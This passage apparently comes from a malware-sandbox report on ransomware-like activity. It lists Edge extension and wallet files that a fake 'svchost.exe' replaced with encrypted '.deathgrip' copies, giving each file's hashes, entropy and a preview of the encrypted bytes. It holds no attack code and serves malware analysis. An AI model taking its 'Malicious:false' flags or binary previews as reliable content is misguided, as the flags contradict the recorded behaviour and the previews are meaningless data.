                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):7.705319582720721
                                                          Encrypted:false
                                                          SSDEEP:24:MvMHxAU3tItvQQNd2n8xdTiulYYu36yc2ZaBzuTOS7m1VVodu76HkS4M:FH/3t6Y0d2q1XMdc2ZPC1VVm/Hb4M
                                                          MD5:B3D525B7983521DFAC05497E9913812A
                                                          SHA1:0D3853250293AE5A858A8B8D92FCE46707B1D4CD
                                                          SHA-256:44728EF0A601E7FC3DA49B18CB8978B4B44DF7EECD1D2A3AE7171540D26F2638
                                                          SHA-512:809FD19950C3D75C8EF1264F8B054AA911D564F87928E0D65AF18F256670DDECFC0DD0D55B3EFD2A653ACE36CA4CD08918C7F8053D294101ED083401009787CD
                                                          Malicious:false
                                                          Preview:.........`.6...z....4..=...%#..?z.K..w........o|t|3....[@...].....B..".n...g'.T.?........I:k./.p& 7wN..... ....Mv.....I.dff.P.....%G.....$.<.x+a1Q8TO:4...bpNwc..L...y.6G.E..oa..^....Q.f^..V.$.%......3#)f..c2-...B........&d.... .E3.....1...5..........-...[.'...(c..L.]..z......k./...r...2K2...p()..L.V.86~.v....H?~.V4..I..{..0...@...K=G.!3....&..d!.m%.:..<...<dz. .M......PiR..@..<ub...:pjzw..][......\;.d.1.p..Y.B..we....=....R..Kk..=t...]..\f....oM......S....`.. xTn8RjDX.E8..I</..b.$n&~."...sw.g{..............T.k.w...K..OOd...u.6...$....4...?. ..kc..W~G^.......f.#H6(.%......,.(w...A...9@Z....].._.Zyj...o}..^...C.,.9D+}.w..f...r..[.(Yr.|.c..0...5-i....9...".+.h....9i....*..k..lp.)}.0.zK.;.nf^#...2x...d..,.cK...s.RS0F.#%.*...A.%Z...........OaU?...1}...7'...^......%.....C..1...O.d>..?nZ..\t...R......."..'.7..:..z.)..y..>}..9^o.WbSrS0cGEKR3/aqonXwViGginOexCJkYCBB9+lMDUYropURTcibc/5ZRPKDTRrt0CQ1fzxRWlJGdkcPd0JgX8TcPd/3Vht5jKmzCyJMDKIZsD+cpWOKv48m3UbgfaYp1

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1792
                                                          Entropy (8bit):7.819215316323085
                                                          Encrypted:false
                                                          SSDEEP:48:ujbIn8hdBW7uC52LTc2KWpAdYnhwBw/HrAV:UbJdBW7eLTc2KIHUecV
                                                          MD5:9C32BAA91EDF1D4542BC61019B2BB7A1
                                                          SHA1:2DC604268B9BCCA887CFDB84CDB5575FD04E60F1
                                                          SHA-256:8A35F74B491176874E85697F7FCC2B7F128883BE339FC7EBC61DF3578AF961BB
                                                          SHA-512:8998E3DC0E8545340254667ED1D333103820673325C97462DF645A74D86D65122770E7FBCC80F97B28C3EF4571B3DC043FAF6C92454224393248777ECBF3425B
                                                          Malicious:false
                                                          Preview:...........O_..S!/...F.4m....qa\.;@{.0..X.R\..w.KG......rvc%3.8.9"..l...U.....T.H....3i...<.B....@.?..x....6..c#..Ab.... I.;j.L..C...)v>.e.........io.. Qe..u..nNy2..Jd.....S...Lc.%.!....?.j..2...i.{........k(@s....\.K......7o..c*.W.~K2h..<.r.c...)O.Nh..M$...?..7-l.E..e0...4.8( ..,...gR.}..j...V...he........mu..........e'..=..%.......#+j..z...{.u#....>~.'s~yf.."..>......e.'...}z3.qD.._.S......~+d..K.'...~...[.~.\...c%.p.s.R...].j...\-0..8.....<.....c.....%4.[#o^..#xk.J..NX7......?r.ZJ..v.m.R].Wf..~H..E.m$.t.b~oc-F...".JA.....Y...l....>.........k.6.e../S.........K9..Nh.....Y..!.;HH...........O;8.p9..._.E...~.{._P.D...ZM,}.....$..d..a.l=.8.p....b.#.........K.'.1.....Q...p.&.$...S.b...m.'s1.'x.R....x,z....%...eHL..5.l..."?1X...{...l"..Mg..._.0D..x3..h.u.K...:*;1.."@..3N+W.a|..N).Z.$...RK..y.........\._....oz.m.wD..4.....9...W....77a..E...*F...v.}.G..]o..'...Lfn......a...lu........../..RG.o.2..1J..W...n..+."...4.g.E....=...iT../U.....s.4....PE.0..9

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1328
                                                          Entropy (8bit):7.726036101452327
                                                          Encrypted:false
                                                          SSDEEP:24:9AOAIfnCjXHk9EJC0rjNg9lY2jFfD7J4lPFO8WPMNaG+/TS9Nabxy:9R7vOHkuM0abxF32lLWkNaGyVxy
                                                          MD5:854D0DCFEB1D6AB0D5DEBA17B95F2BEE
                                                          SHA1:B9BDE20A4703329EF6FAB1A8E11FDBB15C0D1A0F
                                                          SHA-256:00CF19B83E349858355364619F824A5408B4E3DB0074E8BE7F35E5C8FAF47FCE
                                                          SHA-512:A09F5DC0ED62CDCB46F9545958AA12911F1ABC5089433ECC96144BECB76D33579339E94EEA7BF10DA3C594924A29688BE27423E3EE84B715733ACB9AAC768FCC
                                                          Malicious:false
                                                          Preview:...........),hF5.+.... ._.H...J.%}.......g......m..}r.....&.*.=.Y@*.i:...|.*J@|.M.X....`.y).@.0R.$x.Ua.e.. m].JQ.u...f#..O..n...;..Z..k*...l(..ty.f..T&q..i....'.1..:3O5Py..j.B..m..u...A.].8.U-.Y...]Hv....Z..g.^.....3...x.-o <.Y.o.....mP.C... .'....+...%.i..c...~...}..^8...2DjhD..7^P....2l...K..]'.,8........i."w}...p.u...gik'.,..m~...4L)..6..m.&H...U1..}...p.j2i[/%........!.67.).m...(.x........3.....Yq..k.[s..?.X) ....?7....(..Tg....y.I..."{3.m..H../..n.-........2M....Z.8.Z{.D.5.....5J......7{.5...I@...z.Q5v..5.......u.4$. 8.r...v......5..].Z...Z_$9...-z*+V...'..y/..r.o..ss.....K|B6...R.X.!.DE.\. b$.|e..:..G.6/,..a....H.....K..\..U2Z.:.#g?;..(.2....X.z..L.H.V.s.4z...R...3.q.f......W-...>z..7;.'...MA.J.hVL...k.h.B*7h?..@..f.=!....S2....W .e+.Ec2r..2...1M".....&!.H<...P.8..Xg0......t^,......Yh.[ah.dw. ^.8y..."xFY........w.C.+W.f`.D.:.)....L.*X.......'.eU.....#..'....2kQI......U.p1BxM.*8.@u`.`.L...Z...z...R..p..W3R+.J'P.....FvP..D.cPhUF2S51kpynO/j

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1312
                                                          Entropy (8bit):7.723114994529227
                                                          Encrypted:false
                                                          SSDEEP:24:m536g71wEhPMStNhzXrxX51BHRIqfMTmiFs4NIw2bqCr1nQ/c0Qn:y6YbNxXrxX51xK5TfFsP5bqA12Q
                                                          MD5:F2F74D8436E46E8FC28836FCD4F57BE9
                                                          SHA1:A1D1A3ABB5352E4AFF18A20481216EB1A4EDF924
                                                          SHA-256:7821795E136405911FE1771BFAC68FA33ADB7A6A1707F42C1FC19299C306233A
                                                          SHA-512:80D1BE472342208D5FCE0E8084249B53B4C2B4CB6AFBB716CA6D9E85330FE5F85446703FB6A8EEFEB1221B76FEA1D48863019A9F80ADB562ACD0CEDB605BCD9F
                                                          Malicious:false
                                                          Preview:..........bR.p....M.U.....%<..b.raA&...B4P...Rj.{..)H.K=.1.4BZ.....-..v-...SXaP...s.1'.4j...C.....r."W.w.<....]i.b8..r..:...;68(....U......q.... kY]...>..uSJe.%..jRP..O:.U.....r...h..Ei.cr...m.d:\.K....!k.A..j..%.f.7...sL..^.........+c...?u...r.?O...V.wRqJS...:-.@.....l..d..eq.../~...'...*.t...Gr......9..v:....Cw..F.......DYP..M...f^.9%+^.*. ......e.vOu.U.>../]..l.1.@..I=M.r......D.C.....1..8W.O?J...@.w..\..-w.G..$....#...~u!0.XQ.A.F.....&.?$(...}...v...*@I.C..'.JY].&A'...J?G/z..5..,&.\..v.X4.1M9ZV[J........:.<.z...e..:...Z6...kw..1..z..U.q...g`.}.C0....>.......>h..k...<.j.h..5.s.;.+.....$..).Q.1db..q.$B_..3..%i9.[.d.Y...C ..}.....y |..]r....v0.."..Gm)...7.}.............%y...i...3|....7.......e5O..]..*....0.3J-[.......9.^...i.f....1'..a26.)7..4....u....Z.+.......}..>.7B..P'...\.gZf......!(Hu.?...w.....v.;U^....0.J..?...D(.]4=.=.$.!U...$B..L..8..p..+...]...b.D..g.&.P.W..0.....h...nwYieIJ...&.N..!.(0.,...).7e)<..h502oyj614AxxeMFP05yzjCgwwohNPzR

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1328
                                                          Entropy (8bit):7.7071328974183
                                                          Encrypted:false
                                                          SSDEEP:24:TKCCik55vIUv2tj2yzP4YvaW5O6i4puYcMeTa03hxS+Z//oxkqiM3+:TKCCikjrfyzP4Yvdd/VcZTtEOEPTu
                                                          MD5:DEF2AC3352445BDCB5283B9F39219257
                                                          SHA1:E50C16C3CDBC18A79C47B6A3E8849B7BBBB08C4C
                                                          SHA-256:0C4F2C372E816E695F2E0C732CC1214687EB09787D51276004C176ED6126145B
                                                          SHA-512:0ECF12E454534B3A6616F171EEB17DC84C17C3D2335C331F1DD2E346FACD2224CBDE288379BD3489C07BBA26DE79CFD9F84BEB958ACE57A3AF7C355EFB3642BB
                                                          Malicious:false
                                                          Preview:...........SNY..B..*..:...Y.|....-ufn..g.Y..7..<..0R.<.EN..aKg......+1.......n?h...........^.7ydxb6[#5.C..yh.........q.m.Zj`.a. @..f{.@.X.Al,.....o......2......w....il<6.........N...n#...s...o.~#..#...=o..n.".xe0....[$2z.^..&2....>.u...........n.-W.37?.^&.....-.yD......m.S....T......XCF..f....xov..|0*..n\e-.O.yfU..F.....\...l#..[....j..4.59...Mz...d(.f'39.&...$.M|_K... .....4a.v..}.@7....H.Y.'.-....&.pL..s#2.#..b..m.../\!.{..m.W.3!^4S..<..18<+..(.{R.y.{.. ..xS)X..........`....U].h..".C'.....o.U.kY.N.....U.v...-....$(.-e[E2w..{_H(..z.NzI.TT..L..Pa....X...../2..}......W#.Q..|\(.(+....@V...o...x..(.....?A_.2......k.M(H.~4..u..F.@.)5.8./NkB/.k&0#K..DQf.....o....E3.p..2.u.`V.p.......w`xe.F.".L..t.=V.....%qzI...L.^.".hc%..X}fG..*\...$.M.jxX./....N..U(.D%. \.x.X?.-.'.b.+...j:._...?....F.e^.p<.........Z.+...SB....H..a...qw~6.!h........Z6x...j."?..|0w....CX...F.wi!..n.8n{.{...5..v..3.EG)!.V.q..pd.m.\.&.......{.\.Hk|.....&.RIm.Q.s.5.........".8ftu0kdr6Agi6eKWg

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1200
                                                          Entropy (8bit):7.678051370820018
                                                          Encrypted:false
                                                          SSDEEP:24:BsYkCbFIfm0eKdayEFyXkOg+Vt8CXRQMq1NXfSV+EVGBMM:d++0zeyXNt8CXR8X60PBMM
                                                          MD5:3196BADDABCE9393EED7407046DD400B
                                                          SHA1:819F114F11A5314918B4F0D9072480EADF2AC95E
                                                          SHA-256:DC6C427702CD25654D69251B70FCCE068F4E41452F1BC588A8094B43EF3F68D1
                                                          SHA-512:2E18FE831A71E439D377D642BFACDA5C29EA426BEAD8153DC9D571511B6C4757AC972C2A5960D2609509987301B677A552BA7D95FC8F5A27D3AE0E23B6FE4BD8
                                                          Malicious:false
                                                          Preview:...........H^......7....`......m...{..z.E..A-.....x....:..E.>e\.....l..T......p..^.G.../.@..A..Q..+..f....Vp...fe...E?.f.U....<@.....&=.>.NC..`2W]../c..%8.......r.*w...Qq0Nh.zn(.....t....W..2..G{...a.X.G..o.>..l.Y.....o..0.d`...f...QM..M...W=..|_...ymB..Rh...1..k..HT`...;...?!` ..Gr.u..5B.L.......^Z...v.a....t......6@.....eiJB"a..8{..4.&.QX..p....e......0.....p3.g.N....4........)x.!..7B..2\.....A.....Hq7.&d....~......tp.a.4.\.7...=..I....7...B...E...O..U...y.C.{c2Zf'z......).m}...[|*..p/.<..29..e9.....(u. ...q..T.`.+......DF.W.@..iv...w...'.....(..FV.F.m.Y.9.n.E.a'l...P.F.@......km......a.i.c..XOE^.1.C..Q`.3..O....x.o+2?....h...j...H.....J ..".G..W.d/.49s=+..Hr....FN8..M...uw.~.0N....um{...#I.O/]w.X2ZS67.L.....].i.).0....%..A..^....mk.Xb...bd.]r4......L$.Q. W.;U..(/..D..d0F!.}....+%.t.1 %&.>>...i....a..W .U..v/+nVK6fR4u1KbOLohLy9KJgT5taSd1++1JvGHrsEVNiKM8IBVXw28Yk0qqT22czDWLY40i7x/LbjQlXJloNz7K1ue8MNf/tJasmgc1qAJc8JLJlNngXs5VPXCwNzl2H3UiB9MCUKFCbPNFp

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1664
                                                          Entropy (8bit):7.798672761460625
                                                          Encrypted:false
                                                          SSDEEP:48:xll7AGqS+TnkKPLywgdxebMQlbzp3jsLG/bdcF9GN:xP917irgdPwh3jsy/bJ
                                                          MD5:AD1D086EFBDF56DB92544409D81EF7CD
                                                          SHA1:F21F0A89B8D2426D57B57E323D5A48C0DB6FB94C
                                                          SHA-256:B68A81D041BD556D92C86BE952656D850A9D26D13641CA7BF3BC6EE109D7CE68
                                                          SHA-512:35A5B515E0DDB4EBE8D79870BC6B928F8CFF099BA13785261C6C703C64F135F29458F56A5CC06DBB7AB9C2E450524537697F8A696069B533BAAC4E4B35BC9A69
                                                          Malicious:false
                                                          Preview:.........)...4..+9`.w.?...X.2..;.g.S...2.....i.....2.I.,.4......G".ws7...R.h2.y.oc.$..u.....hb.2.?%...<.,K...cz[.s..."c..k....}.V.C...f.. .5w.....s..../.....V...x...i...W.?pmi.(.L..)X,`n.K...SuV\AB..,AS.....L....7....~....@+...\)...r..g...p0*H..L9.).....M.?`d..b...V.t.%e...8.7Z........Rx3.V.X..."9....3[.z)A;.+...w.b!.WQ...d.....U.;.Gjf1g..[.K..........ZmZ.....|.K..?u.d.Y..1...j.....@..,...ej..4.Bq..0..?..\...@0.k..T.....\P....L..YC....5aJ...z.....C\.......Up.3xgp[caj.....W.-.4..$iM.@.c...HC..i.e..B..+.e..\.*..{D.)......(.L.>I~O..G....d .E.....VV...a....|......4A6{j....9F.......8*5...%.*...:.=.....E.`j)L.\wF.4......)......!.`B.._..dgTN...VZ.$;...^.......~.B.[Rs..j..p=.....h.-W.......tw...(.7.[......[......?]*4....[0................b..WPS....J._...!?.e.5../rw.L<.*.p.8.1...dx.>..7..j>.Gs.3,.....Xy...TP..\...R0P.....#...v.]....A...@.T..y.Q.7....F.@@..P0.@.l.._.....&.~.x.$?.=....&<...5..m...m.4@. H.%.R...A....`v....W.?...57.g.(...z....z.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\messages.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\messages.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1264
                                                          Entropy (8bit):7.727112624769987
                                                          Encrypted:false
                                                          SSDEEP:24:io4rJhGgpVI5smvTlPbAMr0cQm/GM0qsLOFYXFUvYkOcru+KdKLyviBuBKkkIziv:H49h7rIGExbAYVQm/AqgXFAYJcy+K8Lv
                                                          MD5:42BD39A4978F25F94578457B23F6E07D
                                                          SHA1:23B2677009305C663360EA46727DFA7B1C0C704E
                                                          SHA-256:53F4B47F2B5AE3D14F905A654577E5D7CA8DC9F46863A2A262CFE6F6CF58C0D7
                                                          SHA-512:D9509AD91F6A28597B4FE61D387E555E84C256BC1DA89C03FD7DF60776C5A731A480BAD9412D8B45A2214962C9936058440F1DE4A0DB5EC8CBEA57F5E160E26B
                                                          Malicious:false
                                                          Preview:..........R:..Z.H...#.Y.r.......7*.....5<.<..V'Nf.A...Eu..........e.{6n..uu..bf..`.p.1...Z....IS..)C..~.!..)....rf.../."...F...-...<.......~..>.!.i...2...y.+.E......~.lT...o(.}........WP.w...x..|.9f...[](g......VW....>>o....P...GH.3|Z.;..X].........\....0G.S..]......g...TA.{.&..._:3...b.r..N.%&....j.4..T~.....o..F`....y..Bi....}T_...........n&.k...&..U..y.A1Z...w....d...,...ny:.?.].Nh/a@o..1.....=.%.....+..Mi...Y...,5.1.|...o.S4.1*.....KP..J.4.g....L.....r..7v.,....|*i....O..L.....pJ.]e.B......E..:-.r...[L8..7.'...$(<.u..O..|*Go......_.a.L..Y...qk.t.Muv...o.?..hX.4A.R......g`M...;....G.......&o..IQ^.n..AN...`"..=....D2.....c.(.f..u...b...a.jZwv^..j.iH....8./:....T.....Z......H.....8.S.m.........N;u_.....p."..p...-.BT(.u....8....#'.&<..<.Q...*G..S. ...t.2..~..8&.j4....aV..O..).0.<.2.,.T.>....+.(..:.Y.a.n.%..9.f.;P..a...........X..'...."..J..3M..`.d0.f...kwj+h.a.UjCilODtRDpKtFiUadOsE+dvQFVW5NsPBuPyu5YSLFhmY2erTg2f5l377Nwz7d/TqV9rMkCthqwx9CRZ

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.LICENSE.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.LICENSE.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2112
                                                          Entropy (8bit):7.851537627591878
                                                          Encrypted:false
                                                          SSDEEP:48:I5fiqRdluqnHK2YiuvE0zaPq2cEHxCI0GhONoKOV:I5fTRdUHvECERaGhRK+
                                                          MD5:3E5841B79C7ECE0F2A8108E9DDCC3393
                                                          SHA1:9B8BE908B47216022C70416EBDC5793FAC1A0174
                                                          SHA-256:880E38F9E9256E86499D0D8DA787C761D05A6442027CD1ECB5B44BF4BEC11401
                                                          SHA-512:FC9D3BE4DF73D8A8EFF4BC12CD162A65FC57AFEE4AB78C63BB99433B2DBB1A225DD5C0EDD78E0058A70BE23DFC3BCA4645AF3844E6B44A9486E40492C26F990E
                                                          Malicious:false
                                                          Preview:.............6g...'.......vR...9.h$.8<_;.....q.J......8).F.Z7R....6W......#.i..u./...,.+.7..{..3.5p......0 a>......P.2..R..B&...L.J.7@........U.g...k....>bI#w....h.~.Gf.+O9tO..$r6>s.;.%k).ld......@..{.X.D5.Y..5...x.1....F]...]MP..C1..v.<.9...70...W..y.:.o.q!...P....$.g.H.r>...Z...^'.k.<..o.7.b..!..A.W....A.6.$.f.F...s..r.5.-.t.^K....>a.$...a...L.m.i..v....U..]+9%.Z.s.D...6......\..He.%.4U...A+.1.V..0dn5.t...F...=K0t..\.K.....2^B.`=u.o/.([r2~X41..Q/....Z.n.q.9.B.2.gI...l.0...6#3S....Mj\`,...jJ.g.n..0.R.....L.. \p..%.6.4......y"..1...;.[.Np._.....*1.k8.x..PP.dN~..E....{u.HW..i:..@....G..,n.}V... ..sc.,3e........V.&.0...F.y......p...f...b..9S..(.-..i.........N...X`..&...E.1....].5[..%......4.8..V.....vL-.>.......&.}(r.P..E^....b...D...z.:....Y..f.^....9S.B...w.].Bk.[..-.E...m.H.....j|..qGHk...9..`..CW....#..VD......._..e.../.A..a.W.S.Rp...YH.....Pm\a..8r..b.$?.....8....DdCd..N..\....8..,....+]...$.mL.V.........>....dZ...v.[.{......JyuB.u\.&.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.deathgrip

                                                          Download File
